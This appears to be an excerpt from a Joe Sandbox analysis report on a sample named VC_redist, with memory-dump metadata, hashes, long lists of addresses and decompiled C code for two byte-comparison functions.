                                                                          0x00040c28
                                                                          0x00040c31
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040c31
                                                                          0x00040c06
                                                                          0x00040c0f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040c0f
                                                                          0x00040be4
                                                                          0x00040bed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040bed
                                                                          0x00040b42
                                                                          0x00040b44
                                                                          0x00040b5c
                                                                          0x00040b64
                                                                          0x00040b66
                                                                          0x00040b7e
                                                                          0x00040b86
                                                                          0x00040b88
                                                                          0x00040ba0
                                                                          0x00040ba8
                                                                          0x00040baa
                                                                          0x00040bb3
                                                                          0x00040bb3
                                                                          0x00000000
                                                                          0x00040baa
                                                                          0x00040b91
                                                                          0x00040b9a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040b9a
                                                                          0x00040b6f
                                                                          0x00040b78
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040b78
                                                                          0x00040b4d
                                                                          0x00040b56
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040aa3
                                                                          0x00040aa7
                                                                          0x00040aab
                                                                          0x00040aad
                                                                          0x00040ac5
                                                                          0x00040ac5
                                                                          0x00040acd
                                                                          0x00040acf
                                                                          0x00040ae7
                                                                          0x00040ae7
                                                                          0x00040aef
                                                                          0x00040af1
                                                                          0x00040b09
                                                                          0x00040b09
                                                                          0x00040b11
                                                                          0x00040b13
                                                                          0x00040b1c
                                                                          0x00040b1c
                                                                          0x00000000
                                                                          0x00040b13
                                                                          0x00040af7
                                                                          0x00040afa
                                                                          0x00040b03
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040b03
                                                                          0x00040ad5
                                                                          0x00040ad8
                                                                          0x00040ae1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040ae1
                                                                          0x00040ab3
                                                                          0x00040ab6
                                                                          0x00040abf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040abf
                                                                          0x00040225
                                                                          0x00040225
                                                                          0x00041016

                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                          • Instruction ID: 7f9865754c9e928978173be0b25f741eae33526bfc4b62e44a27a26df1cfa521
                                                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                          • Instruction Fuzzy Hash: D4C1E4B22051A309DFAD4A7AD43413EBAF16BA27B131A57BDD5B3DB0C4EE30D524C524
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004022D Relevance: .3, Instructions: 331COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0004022D(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























                                                                          0x0004022d
                                                                          0x0004022d
                                                                          0x00040233
                                                                          0x000402aa
                                                                          0x000402ac
                                                                          0x000402ae
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000402b4
                                                                          0x000402ba
                                                                          0x00040341
                                                                          0x00040343
                                                                          0x00040345
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004034b
                                                                          0x00040351
                                                                          0x000403d8
                                                                          0x000403da
                                                                          0x000403dc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000403e2
                                                                          0x000403e8
                                                                          0x0004046f
                                                                          0x00040471
                                                                          0x00040473
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040479
                                                                          0x0004047f
                                                                          0x00040506
                                                                          0x00040508
                                                                          0x0004050a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040516
                                                                          0x0004059e
                                                                          0x000405a0
                                                                          0x000405a2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000405a8
                                                                          0x000405ae
                                                                          0x00040635
                                                                          0x00040637
                                                                          0x00040639
                                                                          0x00040647
                                                                          0x00040649
                                                                          0x00040656
                                                                          0x00040656
                                                                          0x00040649
                                                                          0x00000000
                                                                          0x00040639
                                                                          0x000405bb
                                                                          0x000405bd
                                                                          0x000405d5
                                                                          0x000405dd
                                                                          0x000405df
                                                                          0x000405f7
                                                                          0x000405ff
                                                                          0x00040601
                                                                          0x00040619
                                                                          0x00040621
                                                                          0x00040623
                                                                          0x0004062c
                                                                          0x0004062c
                                                                          0x00000000
                                                                          0x00040623
                                                                          0x0004060a
                                                                          0x00040613
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040613
                                                                          0x000405e8
                                                                          0x000405f1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000405f1
                                                                          0x000405c6
                                                                          0x000405cf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000405cf
                                                                          0x00040524
                                                                          0x00040526
                                                                          0x0004053e
                                                                          0x00040546
                                                                          0x00040548
                                                                          0x00040560
                                                                          0x00040568
                                                                          0x0004056a
                                                                          0x00040582
                                                                          0x0004058a
                                                                          0x0004058c
                                                                          0x00040595
                                                                          0x00040595
                                                                          0x00000000
                                                                          0x0004058c
                                                                          0x00040573
                                                                          0x0004057c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004057c
                                                                          0x00040551
                                                                          0x0004055a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004055a
                                                                          0x0004052f
                                                                          0x00040538
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040538
                                                                          0x0004048c
                                                                          0x0004048e
                                                                          0x000404a6
                                                                          0x000404ae
                                                                          0x000404b0
                                                                          0x000404c8
                                                                          0x000404d0
                                                                          0x000404d2
                                                                          0x000404ea
                                                                          0x000404f2
                                                                          0x000404f4
                                                                          0x000404fd
                                                                          0x000404fd
                                                                          0x00000000
                                                                          0x000404f4
                                                                          0x000404db
                                                                          0x000404e4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000404e4
                                                                          0x000404b9
                                                                          0x000404c2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000404c2
                                                                          0x00040497
                                                                          0x000404a0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000404a0
                                                                          0x000403f5
                                                                          0x000403f7
                                                                          0x0004040f
                                                                          0x00040417
                                                                          0x00040419
                                                                          0x00040431
                                                                          0x00040439
                                                                          0x0004043b
                                                                          0x00040453
                                                                          0x0004045b
                                                                          0x0004045d
                                                                          0x00040466
                                                                          0x00040466
                                                                          0x00000000
                                                                          0x0004045d
                                                                          0x00040444
                                                                          0x0004044d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004044d
                                                                          0x00040422
                                                                          0x0004042b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004042b
                                                                          0x00040400
                                                                          0x00040409
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040409
                                                                          0x0004035e
                                                                          0x00040360
                                                                          0x00040378
                                                                          0x00040380
                                                                          0x00040382
                                                                          0x0004039a
                                                                          0x000403a2
                                                                          0x000403a4
                                                                          0x000403bc
                                                                          0x000403c4
                                                                          0x000403c6
                                                                          0x000403cf
                                                                          0x000403cf
                                                                          0x00000000
                                                                          0x000403c6
                                                                          0x000403ad
                                                                          0x000403b6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000403b6
                                                                          0x0004038b
                                                                          0x00040394
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040394
                                                                          0x00040369
                                                                          0x00040372
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040372
                                                                          0x000402c7
                                                                          0x000402c9
                                                                          0x000402e1
                                                                          0x000402e9
                                                                          0x000402eb
                                                                          0x00040303
                                                                          0x0004030b
                                                                          0x0004030d
                                                                          0x00040325
                                                                          0x0004032d
                                                                          0x0004032f
                                                                          0x00040338
                                                                          0x00040338
                                                                          0x00000000
                                                                          0x0004032f
                                                                          0x00040316
                                                                          0x0004031f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004031f
                                                                          0x000402f4
                                                                          0x000402fd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000402fd
                                                                          0x000402d2
                                                                          0x000402db
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040235
                                                                          0x00040235
                                                                          0x0004023c
                                                                          0x0004023e
                                                                          0x00040252
                                                                          0x00040252
                                                                          0x0004025a
                                                                          0x0004025c
                                                                          0x00040270
                                                                          0x00040270
                                                                          0x00040278
                                                                          0x0004027a
                                                                          0x0004028e
                                                                          0x0004028e
                                                                          0x00040296
                                                                          0x00040298
                                                                          0x000402a1
                                                                          0x000402a1
                                                                          0x00000000
                                                                          0x00040298
                                                                          0x00040280
                                                                          0x00040283
                                                                          0x0004028c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004028c
                                                                          0x00040262
                                                                          0x00040265
                                                                          0x0004026e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004026e
                                                                          0x00040244
                                                                          0x00040247
                                                                          0x00040250
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040250
                                                                          0x00040225
                                                                          0x00040225
                                                                          0x00041016

                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                          • Instruction ID: e990b161545dcc733e98dc94ea025561401ad35563c70c7a787c4d0682480af3
                                                                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                          • Instruction Fuzzy Hash: E2C1E6B22050A30ADFAD4A79D53413EBAF05B927B131A17BDD9B3EB0C4EE30C524D624
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003FE15 Relevance: .3, Instructions: 323COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0003FE15(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
